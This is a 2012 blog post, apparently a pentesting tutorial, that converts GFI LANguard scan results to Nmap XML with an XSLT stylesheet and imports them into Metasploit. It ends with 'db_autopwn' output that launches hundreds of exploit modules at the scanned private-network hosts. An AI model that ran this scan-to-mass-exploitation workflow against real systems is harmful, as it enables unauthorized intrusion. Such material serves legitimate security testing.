Friday, June 22, 2012

Import data from Languard to Metasploit


Today i was searching for how can we import data from Languard Vulnerability Scanner to
Metasploit Framework. Below i describe a simple way to do that by converting Languard’s XML file to
NMAP’s format using AltovaXML XML processor.
GFI LANguard™ is a vulnerability scanner that gives you the power to scan, detect, assess and correct any potential security risk on your network.
Download it trial from here
AltovaXML® 2011 Community Edition is a free XML standards processor that includes the Altova XSLT 1.0 and XSLT 2.0 engines, XQuery engine, XBRL validator, and XML validator.
Download Community Edition  from here
Download MappingMapToMSF.xslt file which is needed for the XML schema conversion.
Code:
<?xml version="1.0" encoding="UTF-8"?>
<!--
www.coresec.org
-->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:vmf="http://www.altova.com/MapForce/UDF/vmf" xmlns:xs="http://www.w3.org/2001/XMLSchema" exclude-result-prefixes="vmf xs">
<xsl:template name="vmf:vmf1_inputtoresult">
<xsl:param name="input" select="/.."/>
<xsl:choose>
<xsl:when test="$input='1'">
<xsl:value-of select="'up'"/>
</xsl:when>
</xsl:choose>
</xsl:template>
<xsl:output method="xml" encoding="UTF-8" indent="yes"/>
<xsl:template match="/">
<nmaprun>
<xsl:attribute name="xsi:noNamespaceSchemaLocation" namespace="http://www.w3.org/2001/XMLSchema-instance"></xsl:attribute>
<xsl:for-each select="Scan">
<xsl:attribute name="startstr">
<xsl:value-of select="string(@CreatedOn)"/>
</xsl:attribute>
<xsl:for-each select="hosts/host">
<xsl:variable name="var1_resultof_vmf__inputtoresult">
<xsl:call-template name="vmf:vmf1_inputtoresult">
<xsl:with-param name="input" select="floor(number(string(respondedToPing)))"/>
</xsl:call-template>
</xsl:variable>
<host>
<status>
<xsl:if test="string(boolean($var1_resultof_vmf__inputtoresult)) != 'false'">
<xsl:attribute name="state">
<xsl:value-of select="$var1_resultof_vmf__inputtoresult"/>
</xsl:attribute>
</xsl:if>
</status>
<address>
<xsl:attribute name="vendor">
<xsl:value-of select="string(mac_vendor)"/>
</xsl:attribute>
<xsl:attribute name="addrtype">ipv4</xsl:attribute>
<xsl:attribute name="addr">
<xsl:value-of select="string(ip)"/>
</xsl:attribute>
</address>
<hostnames>
<hostname>
<xsl:attribute name="name">
<xsl:value-of select="string(hostname)"/>
</xsl:attribute>
</hostname>
</hostnames>
<xsl:for-each select="ports">
<ports>
<xsl:for-each select="port">
<port>
<xsl:attribute name="protocol">tcp</xsl:attribute>
<xsl:attribute name="portid">
<xsl:value-of select="string(floor(number(string(@name))))"/>
</xsl:attribute>
<state>
<xsl:attribute name="state">open</xsl:attribute>
</state>
<service>
<xsl:attribute name="name">
<xsl:value-of select="string(@desc)"/>
</xsl:attribute>
</service>
</port>
</xsl:for-each>
</ports>
</xsl:for-each>
</host>
</xsl:for-each>
<runstats>
<finished>
<xsl:attribute name="elapsed">
<xsl:value-of select="string(floor(number(string(@ScanDuration))))"/>
</xsl:attribute>
</finished>
</runstats>
</xsl:for-each>
</nmaprun>
</xsl:template>
</xsl:stylesheet>
Convert Languard’s XML file to Nmap’s XML format using AltovaXML processor:
Code:
PS C:\LAN2MSF> dir
    Directory: C:\LAN2MSF
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         5/22/2011  12:31 AM            AltovaXMLExamples
-a---          3/4/2011   7:12 AM      24576 Altova.AltovaXML.dll
-a---          3/4/2011   7:12 AM   13985280 AltovaXML.exe
-ar--          3/4/2011  12:11 AM          3 AltovaXML.inst
-a---          3/4/2011  12:00 AM       9027 AltovaXML.jar
-a---         5/22/2011  12:09 AM   14491992 AltovaXMLCmu2011.exe
-a---          3/4/2011  12:00 AM      61005 AltovaXMLJavaDocs.zip
-a---          3/4/2011  12:41 AM       9756 AltovaXMLLib.tlb
-a---          3/4/2011  12:41 AM   13968896 AltovaXML_COM.exe
-a---         5/22/2011  12:00 PM     224328 languard.xml
-a---         5/22/2011   1:24 PM       2931 MappingMapToMSF.xslt
 
PS C:\LAN2MSF> .\AltovaXML /xslt1 "MappingMapToMSF.xslt" /in "languard.xml" /out "out.xml" %*
PS C:\LAN2MSF> dir out.xml
    Directory: C:\LAN2MSF>
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/22/2011   1:28 PM       4232 out.xml
Below is the out.xml file:
Code:
<?xml version="1.0" encoding="UTF-8"?>
<nmaprun xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="C:/Users/wisco/Desktop/FINAL/NMAP.xsd" startstr="05/22/2011 11:44:06 AM">
   <host>
      <status state="up"/>
      <address vendor="" addrtype="ipv4" addr="192.168.200.1"/>
      <hostnames>
          <hostname name="HOST1"/>
      </hostnames>
      <ports>
          <port protocol="tcp" portid="21">
             <state state="open"/>
             <service name="FTP - control (command)"/>
          </port>
          <port protocol="tcp" portid="23">
             <state state="open"/>
             <service name="Telnet protocol - unencrypted text communications"/>
          </port>
          <port protocol="tcp" portid="80">
             <state state="open"/>
             <service name="Hypertext Transfer Protocol (HTTP)"/>
          </port>
          <port protocol="tcp" portid="443">
             <state state="open"/>
             <service name="Hypertext Transfer Protocol over TLS/SSL (HTTPS)"/>
          </port>
          <port protocol="tcp" portid="1723">
             <state state="open"/>
             <service name="Microsoft Point-to-Point Tunneling Protocol (PPTP)"/>
          </port>
          </ports>
        </host>
        [...]
        <runstats>
           <finished elapsed="851"/>
        </runstats>
</nmaprun>
Import out.xml file to mysql database using db_import tool:
Code:
msf > db_driver mysql
[*] Using database driver mysql
 
msf > db_connect user:pass@hostname
 
msf > db_hosts 
Hosts
=====
 
address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------
 
msf > db_import out.xml 
[*] Importing 'Nmap XML' data
[*] Importing host 192.168.200.1
[*] Importing host 192.168.200.100
[*] Importing host 192.168.200.101
[*] Importing host 192.168.200.2
[*] Importing host 192.168.200.20
[*] Successfully imported /opt/framework3/msf3/out.xml
 
msf > db_hosts
Hosts
=====
 
address          mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------          ---  ----  -------  ---------  -----  -------  ----  --------
192.168.200.1                                                         
192.168.200.100                                                       
192.168.200.101                                                       
192.168.200.2                                                         
192.168.200.20                                                        
 
msf > db_services
 
Services
========
host             port  proto  name                                                  state  info
----             ----  -----  ----                                                  -----  ----
192.168.200.1    21    tcp    ftp - control (command)                               open   
192.168.200.1    23    tcp    telnet protocol - unencrypted text communications     open   
192.168.200.1    80    tcp    hypertext transfer protocol (http)                    open   
192.168.200.1    443   tcp    hypertext transfer protocol over tls/ssl (https)      open   
192.168.200.1    1723  tcp    microsoft point-to-point tunneling protocol (pptp)    open   
192.168.200.100  22    tcp    secure shell (ssh)                                    open   
192.168.200.100  53    tcp    domain name system (dns)                              open   
192.168.200.100  80    tcp    hypertext transfer protocol (http)                    open   
192.168.200.101  135   tcp    dce endpoint resolution                               open   
192.168.200.101  139   tcp    netbios netbios session service                       open   
192.168.200.101  445   tcp    microsoft-ds active directory, windows shares         open   
192.168.200.101  8000  tcp    irdmi (intel remote desktop management interface)     open   
192.168.200.2    135   tcp    dce endpoint resolution                               open   
192.168.200.2    139   tcp    netbios netbios session service                       open   
192.168.200.2    445   tcp    microsoft-ds active directory, windows shares         open   
192.168.200.2    554   tcp    real time streaming protocol (rtsp)                   open   
192.168.200.2    3389  tcp    terminal services                                     open   
192.168.200.20   22    tcp    secure shell (ssh)                                    open   
192.168.200.20   111   tcp    sun remote procedure call                             open   
192.168.200.20   139   tcp    netbios netbios session service                       open   
192.168.200.20   445   tcp    microsoft-ds active directory, windows shares         open
Match exploits based on open ports and start exploit process ;)
Code:
msf > db_autopwn -p -t
[*] Analysis completed in 9 seconds (0 vulns / 0 refs)
[*] 
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.200.20:22  exploit/windows/ssh/freesshd_key_exchange  (port match)
[*]   192.168.200.100:80  exploit/unix/webapp/tikiwiki_jhot_exec  (port match)
[*]   192.168.200.100:80  exploit/unix/http/contentkeeperweb_mimencode  (port match)
[*]   192.168.200.1:443  exploit/multi/http/freenas_exec_raw  (port match)
[*]   192.168.200.100:80  exploit/unix/webapp/phpmyadmin_config  (port match)
[*]   192.168.200.1:443  exploit/windows/http/mailenable_auth_header  (port match)
[*]   192.168.200.1:80  exploit/windows/http/xitami_if_mod_since  (port match)
[*]   192.168.200.1:80  exploit/windows/http/ipswitch_wug_maincfgret  (port match)
[*]   192.168.200.1:443  exploit/windows/http/hp_nnm_ovalarm_lang  (port match)
[*]   192.168.200.1:443  exploit/unix/webapp/mitel_awc_exec  (port match)
[*]   192.168.200.1:443  exploit/unix/webapp/nagios3_statuswml_ping  (port match)
[*]   [...]
 
msf > db_autopwn -p -e
[*] (1/699 [0 sessions]): Launching exploit/windows/ssh/freesshd_key_exchange against 192.168.200.20:22...
[*] (2/699 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.200.100:80...
[*] (3/699 [0 sessions]): Launching exploit/unix/http/contentkeeperweb_mimencode against 192.168.200.100:80...
[*] (4/699 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.200.1:443...
[*] (5/699 [0 sessions]): Launching exploit/unix/webapp/phpmyadmin_config against 192.168.200.100:80...
[*] (6/699 [0 sessions]): Launching exploit/windows/http/mailenable_auth_header against 192.168.200.1:443...
[*] (7/699 [0 sessions]): Launching exploit/windows/http/xitami_if_mod_since against 192.168.200.1:80...
[*] (8/699 [0 sessions]): Launching exploit/windows/http/ipswitch_wug_maincfgret against 192.168.200.1:80...
[*] (9/699 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.200.1:443...
[*] [...]
Suggestions and comments are welcome

No comments:

Post a Comment